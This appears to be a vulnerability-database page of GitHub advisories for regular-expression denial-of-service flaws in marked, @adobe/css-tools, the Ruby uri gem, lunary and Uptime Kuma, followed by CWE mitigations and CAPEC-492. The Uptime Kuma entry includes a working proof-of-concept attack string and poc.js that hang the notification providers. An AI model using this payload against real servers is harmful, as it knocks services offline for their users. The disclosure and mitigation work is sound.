      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/23"
    },
    {
      "type": "WEB",
      "url": "https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2016/04/20/11"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Regular Expression Denial of Service in marked"
}

GHSA-HPX4-R86G-5JRG

Vulnerability from github – Published: 2023-08-29 23:33 – Updated: 2023-11-17 22:06
VLAI
Summary
@adobe/css-tools Regular Expression Denial of Service (ReDOS) while Parsing CSS
Details

Impact

@adobe/css-tools version 4.3.0 and earlier are affected by an Improper Input Validation vulnerability that could result in a denial of service while attempting to parse CSS.

Patches

The issue has been resolved in 4.3.1.

Workarounds

None

References

N/A

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@adobe/css-tools"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.3.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-26364"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333",
      "CWE-20"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-08-29T23:33:26Z",
    "nvd_published_at": "2023-11-17T14:15:21Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\n@adobe/css-tools version 4.3.0 and earlier are affected by an Improper Input Validation vulnerability that could result in a denial of service while attempting to parse CSS.\n\n### Patches\nThe issue has been resolved in 4.3.1.\n\n### Workarounds\nNone\n\n### References\nN/A\n\n",
  "id": "GHSA-hpx4-r86g-5jrg",
  "modified": "2023-11-17T22:06:29Z",
  "published": "2023-08-29T23:33:26Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/adobe/css-tools/security/advisories/GHSA-hpx4-r86g-5jrg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26364"
    },
    {
      "type": "WEB",
      "url": "https://github.com/adobe/css-tools/commit/2b09a25d1dbdbb16fe80065e4c9beb5623ee5793"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/adobe/css-tools"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "@adobe/css-tools Regular Expression Denial of Service (ReDOS) while Parsing CSS"
}

GHSA-HV5J-3H9F-99C2

Vulnerability from github – Published: 2023-03-31 06:30 – Updated: 2025-11-04 19:37
VLAI
Summary
Ruby URI component ReDoS issue
Details

A ReDoS issue was discovered in the URI component through 0.12.0 in Ruby through 3.2.1. The URI parser mishandles invalid URLs that have specific characters. It causes an increase in execution time for parsing strings to URI objects. The fixed versions are 0.12.1, 0.11.1, 0.10.2 and 0.10.0.1.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "uri"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.12.0"
            },
            {
              "fixed": "0.12.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "0.12.0"
      ]
    },
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "uri"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.11.0"
            },
            {
              "fixed": "0.11.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "0.11.0"
      ]
    },
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "uri"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.10.1"
            },
            {
              "fixed": "0.10.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "0.10.1"
      ]
    },
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "uri"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.10.0.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-28755"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-03-31T22:43:59Z",
    "nvd_published_at": "2023-03-31T04:15:00Z",
    "severity": "HIGH"
  },
  "details": "A ReDoS issue was discovered in the URI component through 0.12.0 in Ruby through 3.2.1. The URI parser mishandles invalid URLs that have specific characters. It causes an increase in execution time for parsing strings to URI objects. The fixed versions are 0.12.1, 0.11.1, 0.10.2 and 0.10.0.1.",
  "id": "GHSA-hv5j-3h9f-99c2",
  "modified": "2025-11-04T19:37:56Z",
  "published": "2023-03-31T06:30:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28755"
    },
    {
      "type": "WEB",
      "url": "https://www.ruby-lang.org/en/news/2023/03/28/redos-in-uri-cve-2023-28755"
    },
    {
      "type": "WEB",
      "url": "https://www.ruby-lang.org/en/news/2022/12/25/ruby-3-2-0-released"
    },
    {
      "type": "WEB",
      "url": "https://www.ruby-lang.org/en/downloads/releases"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20230526-0003"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/202401-27"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WMIOPLBAAM3FEQNAXA2L7BDKOGSVUT5Z"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/G76GZG3RAGYF4P75YY7J7TGYAU7Z5E2T"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FFZANOQA4RYX7XCB42OO3P24DQKWHEKA"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/27LUWREIFTP3MQAW7QE4PJM4DPAQJWXF"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WMIOPLBAAM3FEQNAXA2L7BDKOGSVUT5Z"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QA6XUKUY7B5OLNQBLHOT43UW7C5NIOQQ"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/G76GZG3RAGYF4P75YY7J7TGYAU7Z5E2T"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FFZANOQA4RYX7XCB42OO3P24DQKWHEKA"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/27LUWREIFTP3MQAW7QE4PJM4DPAQJWXF"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00015.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00000.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2023/04/msg00033.html"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/uri/CVE-2023-28755.yml"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ruby/uri/releases"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ruby/uri"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Ruby URI component ReDoS issue"
}

GHSA-HWW2-5G85-429M

Vulnerability from github – Published: 2023-06-29 15:30 – Updated: 2025-11-04 19:39
VLAI
Summary
URI gem has ReDoS vulnerability
Details

A ReDoS issue was discovered in the URI component before 0.12.2 for Ruby. The URI parser mishandles invalid URLs that have specific characters. There is an increase in execution time for parsing strings to URI objects with rfc2396_parser.rb and rfc3986_parser.rb.

NOTE: this issue exists becuse of an incomplete fix for CVE-2023-28755. Version 0.10.3 is also a fixed version.

The Ruby advisory recommends updating the uri gem to 0.12.2. In order to ensure compatibility with the bundled version in older Ruby series, you may update as follows instead: - For Ruby 3.0: Update to uri 0.10.3 - For Ruby 3.1 and 3.2: Update to uri 0.12.2.

You can use gem update uri to update it. If you are using bundler, please add gem uri, >= 0.12.2 (or other version mentioned above) to your Gemfile.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "uri"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.10.1"
            },
            {
              "fixed": "0.10.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "uri"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.12.0"
            },
            {
              "fixed": "0.12.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "uri"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.11.0"
            },
            {
              "fixed": "0.11.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "uri"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.10.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-36617"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-07-14T21:52:02Z",
    "nvd_published_at": "2023-06-29T13:15:09Z",
    "severity": "MODERATE"
  },
  "details": "A ReDoS issue was discovered in the URI component before 0.12.2 for Ruby. The URI parser mishandles invalid URLs that have specific characters. There is an increase in execution time for parsing strings to URI objects with `rfc2396_parser.rb` and `rfc3986_parser.rb`.\n\nNOTE: this issue exists becuse of an incomplete fix for CVE-2023-28755. Version 0.10.3 is also a fixed version.\n\n[The Ruby advisory recommends](https://www.ruby-lang.org/en/news/2023/06/29/redos-in-uri-CVE-2023-36617/) updating the uri gem to 0.12.2. In order to ensure compatibility with the bundled version in older Ruby series, you may update as follows instead:\n- For Ruby 3.0: Update to uri 0.10.3\n- For Ruby 3.1 and 3.2: Update to uri 0.12.2.\n\nYou can use gem update uri to update it. If you are using bundler, please add gem `uri`, `\u003e= 0.12.2` (or other version mentioned above) to your Gemfile.",
  "id": "GHSA-hww2-5g85-429m",
  "modified": "2025-11-04T19:39:08Z",
  "published": "2023-06-29T15:30:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36617"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ruby/uri/commit/05b1e7d026b886e65a60ee35625229da9ec220bb"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ruby/uri/commit/38bf797c488bcb4a37fb322bfa84977981863ec6"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ruby/uri/commit/3cd938df20db26c9439e9f681aadfb9bbeb6d1c0"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ruby/uri/commit/4d02315181d8a485496f1bb107a6ab51d6f3a35f"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ruby/uri/commit/70794abc162bb15bb934713b5669713d6700d35c"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ruby/uri/commit/7e33934c91b7f8f3ea7b7a4258b468e19f636bc3"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ruby/uri/commit/9a8e0cc03da964054c2a4ea26b59c53c3bae4921"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ruby/uri/commit/ba36c8a3ecad8c16dd3e60a6da9abd768206c8fa"
    },
    {
      "type": "WEB",
      "url": "https://www.ruby-lang.org/en/news/2023/06/29/redos-in-uri-CVE-2023-36617"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20230725-0002"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/27LUWREIFTP3MQAW7QE4PJM4DPAQJWXF"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QA6XUKUY7B5OLNQBLHOT43UW7C5NIOQQ"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/27LUWREIFTP3MQAW7QE4PJM4DPAQJWXF"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00000.html"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/uri/CVE-2023-36617.yml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ruby/uri"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "URI gem has ReDoS vulnerability"
}

GHSA-HX67-J5PJ-H8CH

Vulnerability from github – Published: 2025-03-20 12:32 – Updated: 2025-03-20 12:32
VLAI
Details

A Regular Expression Denial of Service (ReDoS) vulnerability exists in lunary-ai/lunary version git f07a845. The server uses the regex /{.*?}/ to match user-controlled strings. In the default JavaScript regex engine, this regex can take polynomial time to match certain crafted user inputs. As a result, an attacker can cause the server to hang for an arbitrary amount of time by submitting a specially crafted payload. This issue is fixed in version 1.4.26.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-8998"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333",
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-20T10:15:45Z",
    "severity": "HIGH"
  },
  "details": "A Regular Expression Denial of Service (ReDoS) vulnerability exists in lunary-ai/lunary version git f07a845. The server uses the regex /{.*?}/ to match user-controlled strings. In the default JavaScript regex engine, this regex can take polynomial time to match certain crafted user inputs. As a result, an attacker can cause the server to hang for an arbitrary amount of time by submitting a specially crafted payload. This issue is fixed in version 1.4.26.",
  "id": "GHSA-hx67-j5pj-h8ch",
  "modified": "2025-03-20T12:32:49Z",
  "published": "2025-03-20T12:32:49Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-8998"
    },
    {
      "type": "WEB",
      "url": "https://github.com/lunary-ai/lunary/commit/f2bfa036caf2c48686474f4560a9c5abcf5f43b7"
    },
    {
      "type": "WEB",
      "url": "https://huntr.com/bounties/4dbd8648-1dca-4f95-b74f-978ef030e97e"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-HX7H-9VF7-5XHG

Vulnerability from github – Published: 2025-03-31 16:12 – Updated: 2025-08-07 14:02
VLAI
Summary
Uptime Kuma's Regular Expression in pushdeeer and whapi file Leads to ReDoS Vulnerability Due to Catastrophic Backtracking
Details

Summary

There is a ReDoS vulnerability risk in the system, specifically when administrators create notification through the web service(pushdeer and whapi). If a string is provided that triggers catastrophic backtracking in the regular expression, it may lead to a ReDoS attack.

Details

The regular expression\/*$\ is used to match zero or more slashes / at the end of a URL. When a malicious attack string appends a large number of slashes / and a non-slash character at the end of the URL, the regular expression enters a backtracking matching process. During this process, the regular expression engine starts checking each slash from the first one, continuing until it encounters the last non-slash character. Due to the greedy matching nature of the regular expression, this process repeats itself, with each backtrack checking the next slash until the last slash is checked. This backtracking process consumes significant CPU resources.

.replace(/\/*$/, "")

For the regular expression /\/*$/, an attack string like

"https://e" + "/".repeat(100000) + "@" 

can trigger catastrophic backtracking, causing the web service to freeze and potentially leading to a ReDoS attack.

When entered from the web interface, the attack string needs to expand "/".repeat(100000) and be input directly, such as https://e/////////..//@. This triggers catastrophic backtracking, leading to web service lag and posing a potential ReDoS attack risk.

PoC

The poc.js is in: https://gist.github.com/ShiyuBanzhou/26c918f93b07f5ce90e8f7000d29c7a0 The time lag phenomenon can be observed through test-pushdeer-ReDos, which helps verify the presence of the ReDoS attack:

const semver = require("semver");
let test;
const nodeVersion = process.versions.node;
if (semver.satisfies(nodeVersion, ">= 18")) {
    test = require("node:test");
} else {
    test = require("test");
}
const PushDeer = require("../../server/notification-providers/pushdeer.js");

const assert = require("node:assert");

test("Test ReDos - attack string", async (t) => {
    const pushDeer = new PushDeer();
    const notification = {
        pushdeerServer: "https://e" + "/".repeat(100000) + "@",
    };
    const msg = "Test Attacking";
    const startTime = performance.now();
    try {
        pushDeer.send(notification, msg)
    } catch (error) {
    // pass
    }
    const endTime = performance.now();
    const elapsedTime = endTime - startTime;
    const reDosThreshold = 2000;
    assert(elapsedTime <= reDosThreshold, `🚨 Potential ReDoS Attack! send method took ${elapsedTime.toFixed(2)} ms, exceeding threshold of ${reDosThreshold} ms.`);
});

Move the test-uptime-calculator.js file to the ./uptime-kuma/test/backend-test folder and run npm run test-backend to execute the backend tests.

Trigger conditions for whapi jams, In the send function within the uptime-kuma\server\notification-providers\pushdeer.js file: https://gist.github.com/ShiyuBanzhou/bf4cee61603e152c114fa8c4791f9f28

// The attack string "httpS://example" + "/".repeat(100000) + "@"
// poc.js
// Import the target file
const Whapi = require("./uptime-kuma/server/notification-providers/whapi");

// Create an instance of Whapi
const whapi = new Whapi();

const notification = {
    whapiApiUrl: "https://e" + "/".repeat(100000) + "@",
};
// console.log(`${notification.whapiApiUrl}`);
// Define the message to be sent
const msg = "Test Attacking";

// Call the send method and handle exceptions
whapi.send(notification, msg)

// 1-5 are the original installation methods for the project
// 6-8 are attack methods
// ---
// 1.run `git clone https://github.com/louislam/uptime-kuma.git`
// 2.run `cd uptime-kuma`
// 3.run `npm run setup`
// 4.run `npm install pm2 -g && pm2 install pm2-logrotate`
// 5.run `pm2 start server/server.js --name uptime-kuma`
// ---
// 6.Run npm install in the root directory of the same level as `README.md`
// 7.Move `poc.js` to the root directory of the same level as `README.md`
// 8.and then run `node poc.js`

After running, a noticeable lag can be observed, with the regular expression matching time increasing from a few milliseconds to over 2000 milliseconds. redos

You can also perform this attack on the web interface. By timing the operation, it can be observed that the lag still occurs. The key to the attack string is appending a large number of / to the URL, followed by a non-/ character at the end, entered directly.

1 webserver

Impact

What kind of vulnerability is it?

This is a Regular Expression Denial of Service (ReDoS) vulnerability. ReDoS exploits poorly designed regular expressions that can lead to excessive backtracking under certain input conditions, causing the affected application to consume high CPU and memory resources. This can result in significant performance degradation or complete service unavailability, especially when processing specially crafted attack strings.

Who is impacted? 1. Uptime Kuma users: Any users or administrators running the Uptime Kuma project are potentially affected, especially if they allow untrusted input through the web interface or notification services like pushdeer.js and whapi.js. Attackers can exploit this vulnerability by injecting crafted strings into the input fields.

  1. Web services and hosting providers: If Uptime Kuma is deployed in a production environment, the vulnerability could impact hosting providers or servers running the application, leading to downtime, degraded performance, or resource exhaustion.

Solution

@louislam I have provided a solution for you to check:https://github.com/louislam/uptime-kuma/pull/5573

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "uptime-kuma"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.15.0"
            },
            {
              "last_affected": "1.23.16"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "uptime-kuma"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0-beta.0"
            },
            {
              "fixed": "2.0.0-beta.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-26042"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-03-31T16:12:53Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\nThere is a `ReDoS vulnerability risk` in the system, specifically when administrators create `notification` through the web service(`pushdeer` and `whapi`). If a string is provided that triggers catastrophic backtracking in the regular expression, it may lead to a ReDoS attack.\n\n### Details\nThe regular expression` \\/*$\\` is used to match zero or more slashes `/` at the end of a URL. When a malicious attack string appends a large number of slashes `/` and a non-slash character at the end of the URL, the regular expression enters a backtracking matching process. During this process, the regular expression engine starts checking each slash from the first one, continuing until it encounters the last non-slash character. Due to the greedy matching nature of the regular expression, this process repeats itself, with each backtrack checking the next slash until the last slash is checked. This backtracking process consumes significant CPU resources.\n```js\n.replace(/\\/*$/, \"\")\n```\nFor the regular expression `/\\/*$/`, an attack string like \n```javascript\n\"https://e\" + \"/\".repeat(100000) + \"@\" \n```\ncan trigger catastrophic backtracking, causing the web service to freeze and potentially leading to a ReDoS attack.\n\u003e When entered from the web interface, the attack string needs to expand `\"/\".repeat(100000)` and be input directly, such as `https://e/////////..//@`. This triggers catastrophic backtracking, leading to web service lag and posing a potential ReDoS attack risk.\n\n### PoC\nThe poc.js is in: \nhttps://gist.github.com/ShiyuBanzhou/26c918f93b07f5ce90e8f7000d29c7a0\nThe time lag phenomenon can be observed through test-pushdeer-ReDos, which helps verify the presence of the ReDoS attack:\n```javascript\nconst semver = require(\"semver\");\nlet test;\nconst nodeVersion = process.versions.node;\nif (semver.satisfies(nodeVersion, \"\u003e= 18\")) {\n    test = require(\"node:test\");\n} else {\n    test = require(\"test\");\n}\nconst PushDeer = require(\"../../server/notification-providers/pushdeer.js\");\n\nconst assert = require(\"node:assert\");\n\ntest(\"Test ReDos - attack string\", async (t) =\u003e {\n    const pushDeer = new PushDeer();\n    const notification = {\n        pushdeerServer: \"https://e\" + \"/\".repeat(100000) + \"@\",\n    };\n    const msg = \"Test Attacking\";\n    const startTime = performance.now();\n    try {\n        pushDeer.send(notification, msg)\n    } catch (error) {\n    // pass\n    }\n    const endTime = performance.now();\n    const elapsedTime = endTime - startTime;\n    const reDosThreshold = 2000;\n    assert(elapsedTime \u003c= reDosThreshold, `\ud83d\udea8 Potential ReDoS Attack! send method took ${elapsedTime.toFixed(2)} ms, exceeding threshold of ${reDosThreshold} ms.`);\n});\n```\n\u003e Move the `test-uptime-calculator.js` file to the `./uptime-kuma/test/backend-test` folder and run `npm run test-backend` to execute the backend tests.\n\nTrigger conditions for whapi jams, In the send function within the `uptime-kuma\\server\\notification-providers\\pushdeer.js` file:\nhttps://gist.github.com/ShiyuBanzhou/bf4cee61603e152c114fa8c4791f9f28\n```js\n// The attack string \"httpS://example\" + \"/\".repeat(100000) + \"@\"\n// poc.js\n// Import the target file\nconst Whapi = require(\"./uptime-kuma/server/notification-providers/whapi\");\n\n// Create an instance of Whapi\nconst whapi = new Whapi();\n\nconst notification = {\n    whapiApiUrl: \"https://e\" + \"/\".repeat(100000) + \"@\",\n};\n// console.log(`${notification.whapiApiUrl}`);\n// Define the message to be sent\nconst msg = \"Test Attacking\";\n\n// Call the send method and handle exceptions\nwhapi.send(notification, msg)\n\n// 1-5 are the original installation methods for the project\n// 6-8 are attack methods\n// ---\n// 1.run `git clone https://github.com/louislam/uptime-kuma.git`\n// 2.run `cd uptime-kuma`\n// 3.run `npm run setup`\n// 4.run `npm install pm2 -g \u0026\u0026 pm2 install pm2-logrotate`\n// 5.run `pm2 start server/server.js --name uptime-kuma`\n// ---\n// 6.Run npm install in the root directory of the same level as `README.md`\n// 7.Move `poc.js` to the root directory of the same level as `README.md`\n// 8.and then run `node poc.js`\n```\n\nAfter running, a noticeable lag can be observed, with the regular expression matching time increasing from a few milliseconds to over 2000 milliseconds.\n\u003cimg width=\"760\" alt=\"redos\" src=\"https://github.com/user-attachments/assets/98f18fee-7555-410e-98c8-763906843812\" /\u003e\n\nYou can also perform this attack on the web interface. By timing the operation, it can be observed that the lag still occurs. The key to the attack string is appending a large number of `/` to the URL, followed by a `non-/` character at the end, entered directly.\n\n\u003cimg width=\"1280\" alt=\"1\" src=\"https://github.com/user-attachments/assets/61945200-4397-4933-9170-2a5517613408\" /\u003e\n\u003cimg width=\"1280\" alt=\"webserver\" src=\"https://github.com/user-attachments/assets/c0d7e952-0ec1-4c54-ba31-8b7144c04669\" /\u003e\n\n### Impact\n**What kind of vulnerability is it?**\n\nThis is a `Regular Expression Denial of Service (ReDoS)` vulnerability. ReDoS exploits poorly designed regular expressions that can lead to excessive backtracking under certain input conditions, causing the affected application to consume high CPU and memory resources. This can result in `significant performance degradation or complete service unavailability`, especially when processing specially crafted attack strings.\n\n**Who is impacted?**\n1. **Uptime Kuma users**:\nAny users or administrators running the Uptime Kuma project are potentially affected, especially if they allow untrusted input through the web interface or notification services like `pushdeer.js` and `whapi.js`. Attackers can exploit this vulnerability by injecting crafted strings into the input fields.\n\n2. **Web services and hosting providers**:\nIf Uptime Kuma is deployed in a production environment, the vulnerability could impact hosting providers or servers running the application, leading to `downtime`, `degraded performance`, or `resource exhaustion`.\n\n### Solution\n@louislam I have provided a solution for you to check:https://github.com/louislam/uptime-kuma/pull/5573",
  "id": "GHSA-hx7h-9vf7-5xhg",
  "modified": "2025-08-07T14:02:17Z",
  "published": "2025-03-31T16:12:53Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/louislam/uptime-kuma/security/advisories/GHSA-hx7h-9vf7-5xhg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26042"
    },
    {
      "type": "WEB",
      "url": "https://github.com/louislam/uptime-kuma/issues/5574"
    },
    {
      "type": "WEB",
      "url": "https://github.com/louislam/uptime-kuma/pull/5573"
    },
    {
      "type": "WEB",
      "url": "https://github.com/louislam/uptime-kuma/commit/7a9191761dbef6551c2a0aa6eed5f693ba48d688"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/ShiyuBanzhou/26c918f93b07f5ce90e8f7000d29c7a0"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/ShiyuBanzhou/bf4cee61603e152c114fa8c4791f9f28"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/louislam/uptime-kuma"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:N/VA:H/SC:L/SI:L/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Uptime Kuma\u0027s Regular Expression in pushdeeer and whapi file Leads to ReDoS Vulnerability Due to Catastrophic Backtracking"
}

Mitigation
Architecture and Design

Use regular expressions that do not support backtracking, e.g. by removing nested quantifiers.

Mitigation
System Configuration

Set backtracking limits in the configuration of the regular expression implementation, such as PHP's pcre.backtrack_limit. Also consider limits on execution time for the process.

Mitigation
Implementation

Do not use regular expressions with untrusted input. If regular expressions must be used, avoid using backtracking in the expression.

Mitigation
Implementation

Limit the length of the input that the regular expression will process.

CAPEC-492: Regular Expression Exponential Blowup

An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions.